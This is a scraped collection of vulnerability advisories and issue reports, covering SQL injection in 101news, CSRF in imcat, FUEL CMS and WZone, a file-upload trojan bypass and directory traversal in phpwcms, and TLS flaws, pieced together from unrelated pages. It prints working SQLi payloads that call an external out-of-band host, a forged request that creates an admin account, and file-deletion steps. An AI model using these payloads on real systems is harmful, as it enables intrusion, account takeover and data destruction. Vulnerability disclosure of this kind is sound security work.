101news By Mayuri K version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    ## Title: 101news-by-Mayuri-K-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 02.02.2023## Vendor: https://mayurik.com/## Software: https://mayurik.com/source-code/P4030/news-portal-project-in-php## Reference: https://portswigger.net/web-security/sql-injection## Description:The `comment` parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+'was submitted in the comment parameter.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed. This system is absolutelyUNPROTECTED!STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: comment (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&email=YxpqSxQd@burpcollaborator.net&comment=167565'+(selectload_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+''RLIKE (SELECT (CASE WHEN (1140=1140) THEN 0x313637353635+(selectload_file(0x5c5c5c5c316b6d376233693432716b70346d3269793572797068696f62666838357a796e7071646930626f302e6f6173746966792e636f6d5c5c627866))+''ELSE 0x28 END)) AND 'RBgF'='RBgF&submit=    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&email=YxpqSxQd@burpcollaborator.net&comment=167565'+(selectload_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+''AND (SELECT 4135 FROM(SELECT COUNT(*),CONCAT(0x71766b6a71,(SELECT(ELT(4135=4135,1))),0x7171627071,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'iMBs'='iMBs&submit=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: csrftoken=6606c0284475034686192a71b81d3e9360096c1bc0fa486d4a8636d582e2b0c5&name=IRSaszTW&email=YxpqSxQd@burpcollaborator.net&comment=167565'+(selectload_file('\\\\1km7b3i42qkp4m2iy5ryphiobfh85zynpqdi0bo0.oastify.com\\bxf'))+''AND (SELECT 1879 FROM (SELECT(SLEEP(3)))AQLB) AND 'asLq'='asLq&submit=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/101news)## Proof and Exploit:[href](https://streamable.com/vrc7x8)## Time spend:01:00:00

101news By Mayuri K 1.0 SQL Injection

BTicino Door Entry HOMETOUCH for iOS 1.4.2 was discovered to be missing an SSL certificate.

February 06, 2023**1\. Vulnerability Properties**

**Title:** Missing TLS Certificate Validation in DoorEntry HOMETOUCH for iOS  
**CVE ID:** CVE-2022-46496  
**CVSSv3 Base Score:** 7.1 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N  
**Products:** BTicino DoorEntry HOMETOUCH for iOS  
**Advisory Release Date:** 6 February 2023  
**Advisory URL:** https://labs.integrity.pt/advisories/cve-2022-46496  
**Credits:** Discovery by Bruno Morisson

**2\. Vulnerability Summary**

The application does not correctly validate TLS certs when connecting to a specific endpoint, making it possible to perform MITM attacks and obtain user login credentials.

**3\. Vulnerable Versions**

*   < 1.5.1

**4\. Solution**

*   Upgrade to version 1.5.1

**5\. Vulnerability Timeline**

*   25/Nov/22 - Vulnerability reported to vendor
*   30/Nov/22 - Vendor acknowledged report
*   23/Jan/23 - Version 1.5.1 with fix released
*   05/Feb/23 - Vendor informed that new version had been released
*   06/Feb/23 - Advisory published

**6\. References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-46496

CVE-2023-0642 - Cross-Site Request Forgery (CSRF) in Squidex CMS

**Latest Advisories**

*   CVE-2022-46496 - Missing TLS Certificate Validation in DoorEntry HOMETOUCH for iOS
*   CVE-2023-0642 - Cross-Site Request Forgery (CSRF) in Squidex CMS
*   CVE-2022-37721 - Stored Cross-Site Scripting in PyroCMS
*   CVE-2022-37720 - Stored Cross-Site Scripting in OrchardCMS
*   CVE-2022-37251 - Stored XSS in Drafts in Craft CMS

**Latest Articles**

*   The Curious Case of Apple iOS IKEv2 VPN On Demand
*   Gmail Android app insecure Network Security Configuration.
*   Reviewing Android Webviews fileAccess attack vectors.
*   Droidstat-X, Android Applications Security Analyser Xmind Generator
*   Uber Hacking: How we found out who you are, where you are and where you went!

CVE-2022-46496: CVE-2022-46496 - Missing TLS Certificate Validation in DoorEntry HOMETOUCH for iOS

An issue was discovered in Couchbase Server 7.x before 7.0.5 and 7.1.x before 7.1.2. A crafted HTTP REST request from an administrator account to the Couchbase Server Backup Service can exhaust memory resources, causing the process to be killed, which can be used for denial of service.

CVE-2022-42950: Couchbase Alerts

Cross-Site Request Forgery (CSRF) vulnerability in AA-Team WZone – Lite Version plugin 3.1 Lite versions.

**Solution**

No patched version is available. No reply from the vendor since Jul 29, 2022.

ptsfence discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress WZone – Lite Version Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. For example a password change which will then allow the malicious actor to login into the admin account. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-27628: WordPress WZone – Lite Version plugin <= 3.1 Lite - Cross-Site Request Forgery (CSRF) vulnerability - Patchstack

Symfony is a PHP framework for web and console applications and a set of reusable PHP components. When authenticating users Symfony by default regenerates the session ID upon login, but preserves the rest of session attributes. Because this does not clear CSRF tokens upon login, this might enables same-site attackers to bypass the CSRF protection mechanism by performing an attack similar to a session-fixation. This issue has been fixed in the 4.4 branch.

@@ -19,12 +19,15 @@ class CsrfFormLoginTest extends AbstractWebTestCase

public function testFormLoginAndLogoutWithCsrfTokens($config)

{

$client = $this\->createClient(\['test\_case' => 'CsrfFormLogin', 'root\_config' => $config\]);

static::$container\->get('security.csrf.token\_storage')->setToken('foo', 'bar');

  

$form = $client\->request('GET', '/login')->selectButton('login')->form();

$form\['user\_login\[username\]'\] = 'johannes';

$form\['user\_login\[password\]'\] = 'test';

$client\->submit($form);

  

$this\->assertFalse(static::$container\->get('security.csrf.token\_storage')->hasToken('foo'));

  

$this\->assertRedirect($client\->getResponse(), '/profile');

  

$crawler = $client\->followRedirect();

@@ -48,11 +51,14 @@ public function testFormLoginAndLogoutWithCsrfTokens($config)

public function testFormLoginWithInvalidCsrfToken($config)

{

$client = $this\->createClient(\['test\_case' => 'CsrfFormLogin', 'root\_config' => $config\]);

static::$container\->get('security.csrf.token\_storage')->setToken('foo', 'bar');

  

$form = $client\->request('GET', '/login')->selectButton('login')->form();

$form\['user\_login\[\_token\]'\] = '';

$client\->submit($form);

  

$this\->assertTrue(static::$container\->get('security.csrf.token\_storage')->hasToken('foo'));

  

$this\->assertRedirect($client\->getResponse(), '/login');

  

$text = $client\->followRedirect()->text(null, true);

CVE-2022-24895: [Security/Http] Remove CSRF tokens from storage on successful login · symfony/security-bundle@076fd20

Cross Site Request Forgery vulnerability in FUEL-CMS 1.4.13 allows remote attackers to run arbitrary code via post ID to /users/delete/2.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-36569: FUEL CMS 1.4.13 contains a cross-site request forgery (CSRF) vulnerability  · Issue #578 · daylightstudio/FUEL-CMS

Cross Site Request Forgery vulnerability in FUEL-CMS 1.4.13 allows remote attackers to run arbitrary code via post ID to /permissions/delete/2---.

CVE-2021-36570: FUEL CMS 1.4.13 contains a cross-site request forgery (CSRF) vulnerability · Issue #579 · daylightstudio/FUEL-CMS

Cross Site Request Forgery vulnerability in imcat 5.4 allows remote attackers to escalate privilege via lack of token verification.

**1\. Overview**

Official website: http://txjia.com/imcat/

Version: imcat-5.4

Vulnerability type: CSRF post

Source code: https://github.com/peacexie/imcat/releases/tag/v5.4

Harm: Super administrator account can be added

**2\. Analysis**

2.1 logic analysis

In the add administrator page, the security of data source is not verified by token and referer  
  
(1) There is no token used for security verification in the data packet, so there is the possibility of forgery  
POST /imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=& HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 539  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=&recbk=ref  
Cookie: Hm\_lvt\_948dba1e5d873b9c1f1c77078c521c89=1622443371; CKFinder\_Path=Files%3A%2F%3A1; v49\_sessid\_4294e52897e5=2021-6b-hg49-yttfxda8f-7e5f79d1a; v49\_Uniqueid\_01348a66d0e6=2021-6h-a25c-5s8pgxq58-0e63b0fe2; Hm\_lpvt\_948dba1e5d873b9c1f1c77078c521c89=1622444424; twVscAv\_admauth=1606cECE916XO1gVfiR9ahqpqkEJMTxa4R5XjBOh69Cfppjn2zcpGMtx5x7BRkm4L0Vposdev%2B2ydGfzzC3me67ttA1foMK2UXNSybiOLOvH; v49\_vcodes=fmadm%3Dnull%0Afmcomadd%3D1623809462%2C49f8c2fc48af351f%0Afmapply%3D1623830847%2C7da4f846fdbd0243%0A; v49\_ocar\_items=0; PHPSESSID=5b4be5ad4c47747257ac13a5c15265c9  
Upgrade-Insecure-Requests: 1

recbk=http%3A%2F%2F127.0.0.1%2Fimcat%2Froot%2Frun%2Fadm.php%3Fdops-a%26mod%3Dadminer&fm%5Buid%5D=2021-6p-j6xk&fm%5Buno%5D=1&fm%5Buname%5D=qwe\_123&fm%5Bupass%5D=adm\_123&fm%5Bgrade%5D=supper&fm%5Bshow%5D=1&fm%5Bmname%5D=qwe\_123&fm%5Bindep%5D=inadm&fm%5Bmiuid%5D=&fm%5Bmtel%5D=12345678091&fm%5Bmemail%5D=23wqw%4022.com&fm%5Bmaddr%5D=&fm%5Batime%5D=2021-06-21+17%3A14%3A49&fm%5Betime%5D=2021-06-21+17%3A14%3A49&fm%5Bauser%5D=adm\_123&fm%5Beuser%5D=adm\_123&fm%5Baip%5D=127.0.0.1&fm%5Beip%5D=127.0.0.1&bsend=%E6%8F%90%E4%BA%A4&mod=adminer&isadd=1

(2) After deleting the referer: information, you can still add an administrator  

**3\. Loophole recurrence**

(1) Environment preparation, building environment with phpstudy  
  
(2) Construct a payload with the function of creating a super administrator account, qwe\_ 123/adm\_ one hundred and twenty-three

<script>history.pushState('', '', '/')</script> (3) Through a variety of fishing means to lure the administrator to click on the page, that is, to complete the action of adding super administrator without the administrator's knowledge !\[image\](https://user-images.githubusercontent.com/58809869/123199520-9c4db300-d4e1-11eb-8c46-94d9a911babe.png) !\[image\](https://user-images.githubusercontent.com/58809869/123199525-9f48a380-d4e1-11eb-8d18-87c3044191a5.png) !\[image\](https://user-images.githubusercontent.com/58809869/123199531-a2dc2a80-d4e1-11eb-9df6-fb13551bbcfe.png) ### 4. Verification of attack results

Using qwe\_ 123/adm\_ 123 login in the background  

**5\. Means of Defense**

Add a token to the place where important actions are performed for authentication. The value of the token must be random and unpredictable

CVE-2021-36443: CSRF vulnerability in imcat v5.4 · Issue #9 · peacexie/imcat

File Upload vulnerability in phpwcms 1.9.25 allows remote attackers to run arbitrary code via crafted file upload to include/inc_lib/general.inc.php.

在include/inc_lib/general.inc.php 1709行中，使用getimagesize获取了上传图像文件的大小信息。其后未对后缀名进行单独判断，可以制作图片木马进行上传绕过。  
In the line 1709 of include/inc_lib/general.inc.php, use getimagesize to get the size information of the uploaded image file. After that, without a separate judgment on the suffix name, a picture Trojan horse can be made to upload and bypass.

漏洞验证：  
Vulnerability recurrence:：  
登录访问后台页面http://www.pw.com/phpwcms.php?csrftoken=0cc175b9c0f1b6a831c399e269772661&do=files&p=8  
首先点击Create new campaign  
Login to visit the background page http://www.pw.com/phpwcms.php?csrftoken=0cc175b9c0f1b6a831c399e269772661&do=files&p=8 First click Create new campaign

创建任意条目，点击create  
To create any entry, click create

回到上级，点击编辑  
Go back to the upper level, click edit

选中生成好的图片马（在图片文件特殊位置插入php代码，不影响其打开），点击上传，出现报错不用管  
poc下载：2.zip

Select the generated picture horse (insert the php code in the special position of the picture file, it will not affect its opening), click upload, and there will be an error and don’t care.  
pocdownload：2.zip

上传后的文件目录为\\content\\marketing+参数adcampaign\_id，查看下该目录下生成的新文件，文件命名规则为日期\_2  
访问url：http://www.pw.com/content/marketing/3/20210701\_2.php，成功执行php文件  
The uploaded file directory is \\content\\marketing+parameter adcampaign\_id, check the new file generated in this directory, the file naming rule is date\_2  
Visit url: http://www.pw.com/content/marketing/3/20210701\_2.php, successfully execute the php file

修复建议：  
1.正确验证文件后缀。  
2.限制目录执行权限。

Repair suggestions:

1.  Verify the file suffix correctly.
2.  Restrict directory execution permissions.

CVE-2021-36426: Arbitrary file upload vulnerability · Issue #312 · slackero/phpwcms

Directory traversal vulnerability in phpcms 1.9.25 allows remote attackers to delete arbitrary files via unfiltered $file parameter to unlink method in include/inc_act/act_ftptakeover.php file.

在include/inc_act/act_ftptakeover.php 334行中，传入unlink方法的变量$file并未做过滤，导致可以使用../这种形式进行目录穿越删除任意文件。  
In the 334 line of include/inc_act/act_ftptakeover.php, the variable file passed in the unlink method is not filtered, so that the form of ../ can be used for directory traversal to delete any $file.

  

漏洞复现：  
Vulnerability recurrence:  
登录访问后台页面http://www.pw.com/phpwcms.php?csrftoken=0cc175b9c0f1b6a831c399e269772661&do=files&p=8  
首先上传文件后，选中第一个文件，点击take over selected files  
Login to visit the background page http://www.pw.com/phpwcms.php？csrftoken=0cc175b9c0f1b6a831c399e269772661&do=files&p=8  
After uploading files first, select the first file and click take over selected files

使用burpsuite抓包，修改第一个文件的字段段属性，对内容进行base64解码修改为../_.htaccess并再次编码，尝试删除根目录下\_.htaccess文件  
Use burpsuite to capture packets, modify the field attributes of the first file, base64 decode the content, modify it to ../_.htaccess and encode it again, try to delete the \_.htaccess file in the root directory

  
  

调试查看变量值  
Debug to view variable values

文件被成功删除  
The file was successfully deleted

修复建议：  
1.过滤../等特殊字符。  
2.限制目录访问权限。

Repair suggestions:

1.  Filter ../ and other special characters.
2.  Restrict directory access permissions.

Tag

#csrf